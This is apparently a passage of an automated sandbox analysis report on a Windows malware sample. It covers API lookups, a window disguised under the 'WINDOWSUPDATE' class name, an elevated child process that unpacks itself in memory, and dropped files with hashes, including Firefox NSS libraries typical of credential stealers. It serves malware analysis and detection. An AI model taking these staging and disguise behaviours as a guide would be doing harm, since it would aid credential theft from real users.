Get Address c:\windows\syswow64\user32.dll function = InvalidateRect, address_out = 0x74f61381 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = wsprintfW, address_out = 0x74f7e061 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DrawIcon, address_out = 0x74f68deb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = FillRect, address_out = 0x74f60eb6 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SendMessageW, address_out = 0x74f59679 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetDlgItem, address_out = 0x74f7f1ba True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = PostQuitMessage, address_out = 0x74f59abb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = EndPaint, address_out = 0x74f61341 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = BeginPaint, address_out = 0x74f61361 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DefWindowProcW, address_out = 0x771625dd True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DestroyWindow, address_out = 0x74f59a55 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DialogBoxParamW, address_out = 0x74f7cfca True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MoveWindow, address_out = 0x74f63698 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetClientRect, address_out = 0x74f60c62 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CreateDialogParamW, address_out = 0x74f810dc True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = UpdateWindow, address_out = 0x74f63559 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = ShowWindow, address_out = 0x74f60dfb True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = SetWindowPos, address_out = 0x74f58e4e True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = CreateWindowExW, address_out = 0x74f58a29 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = RegisterClassExW, address_out = 0x74f5b17d True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadCursorW, address_out = 0x74f588f7 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = DispatchMessageW, address_out = 0x74f5787b True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = TranslateMessage, address_out = 0x74f57809 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = TranslateAcceleratorW, address_out = 0x74f61246 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetMessageW, address_out = 0x74f578e2 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadAcceleratorsW, address_out = 0x74f64dd6 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadStringW, address_out = 0x74f58eb9 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = LoadIconW, address_out = 0x74f5b142 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetMonitorInfoW, address_out = 0x74f63000 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MonitorFromWindow, address_out = 0x74f63150 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = TextOutW, address_out = 0x75aed41c True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SetBkMode, address_out = 0x75ae51a2 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SelectObject, address_out = 0x75ae4f70 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = CreateFontW, address_out = 0x75aeb600 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = DeleteObject, address_out = 0x75ae5689 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = CreateSolidBrush, address_out = 0x75ae4f17 True 1
Fn
Get Address c:\windows\syswow64\gdi32.dll function = SetTextAlign, address_out = 0x75ae8401 True 1
Fn
Get Address c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll function = InitCommonControlsEx, address_out = 0x748409ce True 1
Fn
Get Address c:\windows\syswow64\winmm.dll function = timeGetTime, address_out = 0x74af26e0 True 1
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x749dc544 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Fn
Window (1)
»
Operation Window Name Additional Information Success Count Logfile
Create Windows Update class_name = WINDOWSUPDATE, wndproc_parameter = 0 True 1
Fn
System (266)
»
Operation Additional Information Success Count Logfile
Sleep duration = 1000 milliseconds (1.000 seconds) True 10
Fn
Get Time type = System Time, time = 2019-03-24 16:36:37 (UTC) True 1
Fn
Get Time type = Ticks, time = 120198 True 1
Fn
Get Time type = Performance Ctr, time = 18241963676 True 1
Fn
Get Time type = Ticks, time = 120229 True 1
Fn
Get Time type = System Time True 249
Fn
Get Time type = System Time, time = 2019-03-24 16:36:38 (UTC) True 1
Fn
Get Time type = Performance Ctr, time = 18359128587 True 1
Fn
Get Info type = Operating System True 1
Fn
Environment (2)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Fn
Data
Process #12: 5.exe
1347 2
»
Information Value
ID #12
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\31d598d6-7a99-49f9-bbea-5545d7a59a7d\5.exe"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:01:02, Reason: Child Process
Unmonitor End Time: 00:01:17, Reason: Self Terminated
Monitor Duration 00:00:14
OS Process Information
»
Information Value
PID 0xa38
Parent PID 0x99c (c:\users\5p5nrgjn0js halpmcxz\desktop\killeryuga.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x A3C
0x A78
0x A7C
0x A80
0x A84
0x A88
0x A8C
0x A90
0x ACC
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points YARA Actions
5.exe 0x00400000 0x0047FFFF Marked Writable - 32-bit - False
...
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x00405B40, 0x0040273D False
...
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x0040372A, 0x00404440 False
...
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x00409000, 0x00408FEA, ... False
...
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x0040D36D, 0x0040B64F False
...
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x00401A8A, 0x0040AF97, ... False
...
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x00422DC0, 0x00424B80 False
...
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x00423300 False
...
buffer 0x00549D18 0x00559C80 Marked Executable - 32-bit - False
...
buffer 0x00549D18 0x00559C80 Content Changed - 32-bit 0x0054A643, 0x00549D18 False
...
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x0041A684 True
...
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x0040C3C4 True
...
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x00414020 True
...
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x00412564 True
...
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x004108F8 True
...
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x00415290 True
...
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x004176D0 True
...
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x00418CEC True
...
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x00419108 True
...
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x0040F944 True
...
5.exe 0x00400000 0x0047FFFF Content Changed - 32-bit 0x004132E0 True
...
Dropped Files
»
Filename File Size Hash Values YARA Match Actions
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-console-l1-1-0.dll 18.30 KB MD5: 502263c56f931df8440d7fd2fa7b7c00
SHA1: 523a3d7c3f4491e67fc710575d8e23314db2c1a2
SHA256: 94a5df1227818edbfd0d5091c6a48f86b4117c38550343f780c604eee1cd6231
SSDeep: 192:3jBMWIghWGZiKedXe123Ouo+Uggs/nGfe4pBjS/uBmWh0txKdmVWQ4GWDZoiyqnP:GWPhWVXYi00GftpBjSemTltcwpS 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-debug-l1-1-0.dll 17.80 KB MD5: 88ff191fd8648099592ed28ee6c442a5
SHA1: 6a4f818b53606a5602c609ec343974c2103bc9cc
SHA256: c310cc91464c9431ab0902a561af947fa5c973925ff70482d3de017ed3f73b7d
SSDeep: 384:cWPhWM4Ri00GftpBj2YILemtclD16PaEC:l10oiBQe/L 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-file-l1-2-0.dll 17.80 KB MD5: e2f648ae40d234a3892e1455b4dbbe05
SHA1: d9d750e828b629cfb7b402a3442947545d8d781b
SHA256: c8c499b012d0d63b7afc8b4ca42d6d996b2fcf2e8b5f94cacfbec9e6f33e8a03
SSDeep: 192:IWIghWGJnWdsNtL/123Ouo+Uggs/nGfe4pBjSfcD63QXWh0txKdmVWQ4yW1rwqnh:IWPhWlsnhi00GftpBjnem9lD16PamFP 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-file-l2-1-0.dll 17.80 KB MD5: e479444bdd4ae4577fd32314a68f5d28
SHA1: 77edf9509a252e886d4da388bf9c9294d95498eb
SHA256: c85dc081b1964b77d289aac43cc64746e7b141d036f248a731601eb98f827719
SSDeep: 192:BZwWIghWG4U9ydsNtL/123Ouo+Uggs/nGfe4pBjSbUGHvNWh0txKdmVWQ4CWVU9h:UWPhWFBsnhi00GftpBjKvxemPlP55QQ7 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-libraryloader-l1-1-0.dll 18.30 KB MD5: d0873e21721d04e20b6ffb038accf2f1
SHA1: 9e39e505d80d67b347b19a349a1532746c1f7f88
SHA256: bb25ccf8694d1fcfce85a7159dcf6985fdb54728d29b021cb3d14242f65909ce
SSDeep: 384:yHvuBL3BmWPhWZTi00GftpBjNKnemenyAlvN9W/L:yWBL3BXYoinKne1yd 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-localization-l1-2-0.dll 20.30 KB MD5: eff11130bfe0d9c90c0026bf2fb219ae
SHA1: cf4c89a6e46090d3d8feeb9eb697aea8a26e4088
SHA256: 03ad57c24ff2cf895b5f533f0ecbd10266fd8634c6b9053cc9cb33b814ad5d97
SSDeep: 384:KOMw3zdp3bwjGjue9/0jCRrndbVWPhWIDz6i00GftpBj6cemjlD16Pa+4r:KOMwBprwjGjue9/0jCRrndbCOoireqv 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-synch-l1-1-0.dll 19.80 KB MD5: 71af7ed2a72267aaad8564524903cff6
SHA1: 8a8437123de5a22ab843adc24a01ac06f48db0d3
SHA256: 5dd4ccd63e6ed07ca3987ab5634ca4207d69c47c2544dfefc41935617652820f
SSDeep: 384:5Xdv3V0dfpkXc0vVaHWPhWXEi00GftpBj9em+4lndanJ7o:5Xdv3VqpkXc0vVa8poivex 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-synch-l1-2-0.dll 18.30 KB MD5: 0d1aa99ed8069ba73cfd74b0fddc7b3a
SHA1: ba1f5384072df8af5743f81fd02c98773b5ed147
SHA256: 30d99ce1d732f6c9cf82671e1d9088aa94e720382066b79175e2d16778a3dad1
SSDeep: 384:JtZ3gWPhWFA0i00GftpBj4Z8wemFfYlP55t:j+oiVweb53 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-util-l1-1-0.dll 17.80 KB MD5: 0f079489abd2b16751ceb7447512a70d
SHA1: 679dd712ed1c46fbd9bc8615598da585d94d5d87
SHA256: f7d450a0f59151bcefb98d20fcae35f76029df57138002db5651d1b6a33adc86
SSDeep: 192:pePWIghWG4U9wluZo123Ouo+Uggs/nGfe4pBjSbKT8wuxWh0txKdmVWQ4CWnFnwQ:pYWPhWFS0i00GftpBj7DudemJlP552 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-environment-l1-1-0.dll 18.30 KB MD5: ac290dad7cb4ca2d93516580452eda1c
SHA1: fa949453557d0049d723f9615e4f390010520eda
SHA256: c0d75d1887c32a1b1006b3cffc29df84a0d73c435cdcb404b6964be176a61382
SSDeep: 192:bWIghWGd4edXe123Ouo+Uggs/nGfe4pBjSXXmv5Wh0txKdmVWQ4SWEApkqnajPBZ:bWPhWqXYi00GftpBjBemPl1z6h2 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-filesystem-l1-1-0.dll 19.80 KB MD5: aec2268601470050e62cb8066dd41a59
SHA1: 363ed259905442c4e3b89901bfd8a43b96bf25e4
SHA256: 7633774effe7c0add6752ffe90104d633fc8262c87871d096c2fc07c20018ed2
SSDeep: 384:sq6nWm5C1WPhWFK0i00GftpBjB1UemKklUG+zIOd/:x6nWm5CiooiKeZnbd/ 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-heap-l1-1-0.dll 18.80 KB MD5: 93d3da06bf894f4fa21007bee06b5e7d
SHA1: 1e47230a7ebcfaf643087a1929a385e0d554ad15
SHA256: f5cf623ba14b017af4aec6c15eee446c647ab6d2a5dee9d6975adc69994a113d
SSDeep: 192:+Y3vY17aFBR4WIghWG4U9CedXe123Ouo+Uggs/nGfe4pBjSbGGAPWh0txKdmVWQC:+Y3e9WPhWFsXYi00GftpBjfemnlP55s 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-multibyte-l1-1-0.dll 25.80 KB MD5: 35fc66bd813d0f126883e695664e7b83
SHA1: 2fd63c18cc5dc4defc7ea82f421050e668f68548
SHA256: 66abf3a1147751c95689f5bc6a259e55281ec3d06d3332dd0ba464effa716735
SSDeep: 384:kDy+Kr6aLPmIHJI6/CpG3t2G3t4odXL5WPhWFY0i00GftpBjbnMxem8hzlmTMiLV:kDZKrZPmIHJI64GoiZMxe0V 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/msvcp140.dll 429.80 KB MD5: 109f0f02fd37c84bfc7508d4227d7ed5
SHA1: ef7420141bb15ac334d3964082361a460bfdb975
SHA256: 334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4
SSDeep: 12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-file-l1-1-0.dll 21.30 KB MD5: 94ae25c7a5497ca0be6882a00644ca64
SHA1: f7ac28bbc47e46485025a51eeb6c304b70cee215
SHA256: 7ea06b7050f9ea2bcc12af34374bdf1173646d4e5ebf66ad690b37f4df5f3d4e
SSDeep: 384:d6PvVXHWPhWnsnhi00GftpBjaJemyDlD16PamW8:UPvVX85nhoisJeLt8 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/freebl3.dll 324.95 KB MD5: 343aa83574577727aabe537dccfdeafc
SHA1: 9ce3b9a182429c0dba9821e2e72d3ab46f5d0a06
SHA256: 393ae7f06fe6cd19ea6d57a93dd0acd839ee39ba386cf1ca774c4c59a3bfebd8
SSDeep: 6144:C+YBCxpjbRIDmvby5xDXlFVJM8PojGGHrIr1qqDL6XP+jW:Cu4Abg7XV72GI/qn6z 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-datetime-l1-1-0.dll 17.80 KB MD5: cb978304b79ef53962408c611dfb20f5
SHA1: eca42f7754fb0017e86d50d507674981f80bc0b9
SHA256: 90fae0e7c3644a6754833c42b0ac39b6f23859f9a7cf4b6c8624820f59b9dad3
SSDeep: 192:RWIghWG4U9xluZo123Ouo+Uggs/nGfe4pBjSbMDPxVWh0txKdmVWQ4CWrDry6qnZ:RWPhWFv0i00GftpBjBHem6plUG+zIw 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-errorhandling-l1-1-0.dll 17.80 KB MD5: 6d778e83f74a4c7fe4c077dc279f6867
SHA1: f5d9cf848f79a57f690da9841c209b4837c2e6c3
SHA256: a97dcca76cdb12e985dff71040815f28508c655ab2b073512e386dd63f4da325
SSDeep: 192:NFmxD3PWIghWGJY/luZo123Ouo+Uggs/nGfe4pBjSffcp8Wh0txKdmVWQ4yWRzOr:NFkWPhW60i00GftpBj4emHlD16Pa7v 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-handle-l1-1-0.dll 17.80 KB MD5: 6db54065b33861967b491dd1c8fd8595
SHA1: ed0938bbc0e2a863859aad64606b8fc4c69b810a
SHA256: 945cc64ee04b1964c1f9fcdc3124dd83973d332f5cfb696cdf128ca5c4cbd0e5
SSDeep: 384:AWPhWXDz6i00GftpBj5FrFaemx+lDbNh/6:hroidkeppp 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-heap-l1-1-0.dll 17.80 KB MD5: 2ea3901d7b50bf6071ec8732371b821c
SHA1: e7be926f0f7d842271f7edc7a4989544f4477da7
SHA256: 44f6df4280c8ecc9c6e609b1a4bfee041332d337d84679cfe0d6678ce8f2998a
SSDeep: 192:GElqWIghWGZi5edXe123Ouo+Uggs/nGfe4pBjS/PHyRWh0txKdmVWQ4GWC2w4Dj3:GElqWPhWCXYi00GftpBjP9emYXlDbNs 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-interlocked-l1-1-0.dll 17.44 KB MD5: d97a1cb141c6806f0101a5ed2673a63d
SHA1: d31a84c1499a9128a8f0efea4230fcfa6c9579be
SHA256: deccd75fc3fc2bb31338b6fe26deffbd7914c6cd6a907e76fd4931b7d141718c
SSDeep: 192:DtiYsFWWIghWGQtu7B123Ouo+Uggs/nGfe4pBjSPiZadcbWh0txKdmVWQ4mWf2FN:5iYsFWWPhWUTi00GftpBjremUBNlgC 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-memory-l1-1-0.dll 18.30 KB MD5: d500d9e24f33933956df0e26f087fd91
SHA1: 6c537678ab6cfd6f3ea0dc0f5abefd1c4924f0c0
SHA256: bb33a9e906a5863043753c44f6f8165afe4d5edb7e55efa4c7e6e1ed90778eca
SSDeep: 384:+bZWPhWUsnhi00GftpBjwBemQlD16Par7:b4nhoi6BedH 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-namedpipe-l1-1-0.dll 17.80 KB MD5: 6f6796d1278670cce6e2d85199623e27
SHA1: 8aa2155c3d3d5aa23f56cd0bc507255fc953ccc3
SHA256: c4f60f911068ab6d7f578d449ba7b5b9969f08fc683fd0ce8e2705bbf061f507
SSDeep: 192:pgWIghWGZiBeS123Ouo+Uggs/nGfe4pBjS/fE/hWh0txKdmVWQ4GWoxYyqnaj/6B:iWPhWUEi00GftpBj1temnltcwWB 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-processenvironment-l1-1-0.dll 18.80 KB MD5: 5f73a814936c8e7e4a2dfd68876143c8
SHA1: d960016c4f553e461afb5b06b039a15d2e76135e
SHA256: 96898930ffb338da45497be019ae1adcd63c5851141169d3023e53ce4c7a483e
SSDeep: 192:wXjWIghWGd4dsNtL/123Ouo+Uggs/nGfe4pBjSXcYddWh0txKdmVWQ4SW04engo5:MjWPhWHsnhi00GftpBjW7emOj5l1z6hP 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-processthreads-l1-1-0.dll 18.94 KB MD5: a2d7d7711f9c0e3e065b2929ff342666
SHA1: a17b1f36e73b82ef9bfb831058f187535a550eb8
SHA256: 9dab884071b1f7d7a167f9bec94ba2bee875e3365603fa29b31de286c6a97a1d
SSDeep: 384:afk1JzNcKSIJWPhW2snhi00GftpBjZqcLvemr4PlgC:RcKST+nhoi/BbeGv 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-processthreads-l1-1-1.dll 18.30 KB MD5: d0289835d97d103bad0dd7b9637538a1
SHA1: 8ceebe1e9abb0044808122557de8aab28ad14575
SHA256: 91eeb842973495deb98cef0377240d2f9c3d370ac4cf513fd215857e9f265a6a
SSDeep: 384:xzADfIeRWPhWKEi00GftpBjj1emMVlvN0M:xzfeWeoi11ep 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-profile-l1-1-0.dll 17.30 KB MD5: fee0926aa1bf00f2bec9da5db7b2de56
SHA1: f5a4eb3d8ac8fb68af716857629a43cd6be63473
SHA256: 8eb5270fa99069709c846db38be743a1a80a42aa1a88776131f79e1d07cc411c
SSDeep: 192:w9WIghWGdUuDz7M123Ouo+Uggs/nGfe4pBjSXrw58h6Wh0txKdmVWQ4SW7QQtzko:w9WPhWYDz6i00GftpBjXPemD5l1z6hv 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-rtlsupport-l1-1-0.dll 17.30 KB MD5: fdba0db0a1652d86cd471eaa509e56ea
SHA1: 3197cb45787d47bac80223e3e98851e48a122efa
SHA256: 2257fea1e71f7058439b3727ed68ef048bd91dcacd64762eb5c64a9d49df0b57
SSDeep: 384:61G1WPhWksnhi00GftpBjEVXremWRlP55Jk:kGiYnhoiqVXreDT5Y 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-string-l1-1-0.dll 17.80 KB MD5: 12cc7d8017023ef04ebdd28ef9558305
SHA1: f859a66009d1caae88bf36b569b63e1fbdae9493
SHA256: 7670fdede524a485c13b11a7c878015e9b0d441b7d8eb15ca675ad6b9c9a7311
SSDeep: 384:xyMvRWPhWFs0i00GftpBjwCJdemnflUG+zI4:xyMvWWoibeTnn 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-sysinfo-l1-1-0.dll 18.80 KB MD5: 19a40af040bd7add901aa967600259d9
SHA1: 05b6322979b0b67526ae5cd6e820596cbe7393e4
SHA256: 4b704b36e1672ae02e697efd1bf46f11b42d776550ba34a90cd189f6c5c61f92
SSDeep: 384:2q25WPhWWsnhi00GftpBj1u6qXxem4l1z6hi:25+SnhoiG6IeA8 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-core-timezone-l1-1-0.dll 17.80 KB MD5: babf80608fd68a09656871ec8597296c
SHA1: 33952578924b0376ca4ae6a10b8d4ed749d10688
SHA256: 24c9aa0b70e557a49dac159c825a013a71a190df5e7a837bfa047a06bba59eca
SSDeep: 384:SWPhWK3di00GftpBjH35Gvem2Al1z6hIu:77NoiOve7eu 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-conio-l1-1-0.dll 18.80 KB MD5: 6ea692f862bdeb446e649e4b2893e36f
SHA1: 84fceae03d28ff1907048acee7eae7e45baaf2bd
SHA256: 9ca21763c528584bdb4efebe914faaf792c9d7360677c87e93bd7ba7bb4367f2
SSDeep: 384:8WPhWz4Ri00GftpBjDb7bemHlndanJ7DW:Fm0oiV7beV 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-convert-l1-1-0.dll 21.80 KB MD5: 72e28c902cd947f9a3425b19ac5a64bd
SHA1: 9b97f7a43d43cb0f1b87fc75fef7d9eeea11e6f7
SHA256: 3cc1377d495260c380e8d225e5ee889cbb2ed22e79862d4278cfa898e58e44d1
SSDeep: 384:EuydWPhW7snhi00GftpBjd6t/emJlDbN:3tnhoi6t/eAp 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-locale-l1-1-0.dll 18.30 KB MD5: a2f2258c32e3ba9abf9e9e38ef7da8c9
SHA1: 116846ca871114b7c54148ab2d968f364da6142f
SHA256: 565a2eec5449eeeed68b430f2e9b92507f979174f9c9a71d0c36d58b96051c33
SSDeep: 192:fiWIghWGZirX+4z123Ouo+Uggs/nGfe4pBjS/RFcpOWh0txKdmVWQ4GWs8ylDikh:aWPhWjO4Ri00GftpBjZOemSXlvNQ0 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-runtime-l1-1-0.dll 22.30 KB MD5: 41a348f9bedc8681fb30fa78e45edb24
SHA1: 66e76c0574a549f293323dd6f863a8a5b54f3f9b
SHA256: c9bbc07a033bab6a828ecc30648b501121586f6f53346b1cd0649d7b648ea60b
SSDeep: 384:7b7hrKwWPhWFlsnhi00GftpBj+6em90lmTMiLzrF7:7bNrKxZnhoig6eQN7 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-string-l1-1-0.dll 22.94 KB MD5: 404604cd100a1e60dfdaf6ecf5ba14c0
SHA1: 58469835ab4b916927b3cabf54aee4f380ff6748
SHA256: 73cc56f20268bfb329ccd891822e2e70dd70fe21fc7101deb3fa30c34a08450c
SSDeep: 384:5iFMx0C5yguNvZ5VQgx3SbwA7yMVIkFGlnWPhWGTi00GftpBjslem89lgC:56S5yguNvZ5VQgx3SbwA71IkFv5oialj 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/nss3.dll 1.19 MB MD5: 556ea09421a0f74d31c4c0a89a70dc23
SHA1: f739ba9b548ee64b13eb434a3130406d23f836e3
SHA256: f0e6210d4a0d48c7908d8d1c270449c91eb4523e312a61256833bfeaf699abfb
SSDeep: 24576:XDI7I4/FeoJQuQ3IhXtHfjyqgJ0BnPQAib7/12bg2JSna5xfg0867U4MSpu731hn:uQ3YX5jyqgynPkbd24VwMSpu7Fhn 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/mozglue.dll 135.95 KB MD5: 9e682f1eb98a9d41468fc3e50f907635
SHA1: 85e0ceca36f657ddf6547aa0744f0855a27527ee
SHA256: 830533bb569594ec2f7c07896b90225006b90a9af108f49d6fb6bebd02428b2d
SSDeep: 3072:8Oqe98Ea4usvd5jm6V0InXx/CHzGYC6NccMmxK3atIYHD2JJJsPyimY4kQkE:Vqe98Evua5Sm0ux/5YC6NccMmtXHD2JR 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/vcruntime140.dll 81.82 KB MD5: 7587bf9cb4147022cd5681b015183046
SHA1: f2106306a8f6f0da5afb7fc765cfa0757ad5a628
SHA256: c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d
SSDeep: 1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-stdio-l1-1-0.dll 23.80 KB MD5: fefb98394cb9ef4368da798deab00e21
SHA1: 316d86926b558c9f3f6133739c1a8477b9e60740
SHA256: b1e702b840aebe2e9244cd41512d158a43e6e9516cd2015a84eb962fa3ff0df7
SSDeep: 384:GZpFVhjWPhWxEi00GftpBjmjjem3Cl1z6h1r:eCfoi0espbr 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-math-l1-1-0.dll 28.30 KB MD5: 8b0ba750e7b15300482ce6c961a932f0
SHA1: 71a2f5d76d23e48cef8f258eaad63e586cfc0e19
SHA256: bece7bab83a5d0ec5c35f0841cbbf413e01ac878550fbdb34816ed55185dcfed
SSDeep: 384:7OTEmbM4Oe5grykfIgTmLyWPhW30i00GftpBjAKemXlDbNl:dEMq5grxfInbRoiNeSp 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-time-l1-1-0.dll 20.30 KB MD5: 849f2c3ebf1fcba33d16153692d5810f
SHA1: 1f8eda52d31512ebfdd546be60990b95c8e28bfb
SHA256: 69885fd581641b4a680846f93c2dd21e5dd8e3ba37409783bc5b3160a919cb5d
SSDeep: 384:8ZSWWVgWPhWFe3di00GftpBjnlfemHlUG+zITA+0:XRNoibernAA+0 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\FF335045\/api-ms-win-crt-utility-l1-1-0.dll 18.30 KB MD5: b52a0ca52c9c207874639b62b6082242
SHA1: 6fb845d6a82102ff74bd35f42a2844d8c450413b
SHA256: a1d1d6b0cb0a8421d7c0d1297c4c389c95514493cd0a386b49dc517ac1b9a2b0
SSDeep: 192:QqfHQdu3WIghWG4U9lYdsNtL/123Ouo+Uggs/nGfe4pBjSb8Z9Wh0txKdmVWQ4Cg:/fBWPhWF+esnhi00GftpBjLBemHlP55q 		False
...
C:\Users\5P5NRG~1\AppData\Local\Temp\1266573240679662425370.tmp 18.00 KB MD5: 29844404ae855e9df054833f71888eb1
SHA1: 3e86f08def08fc14ddec0227d0643319562666db
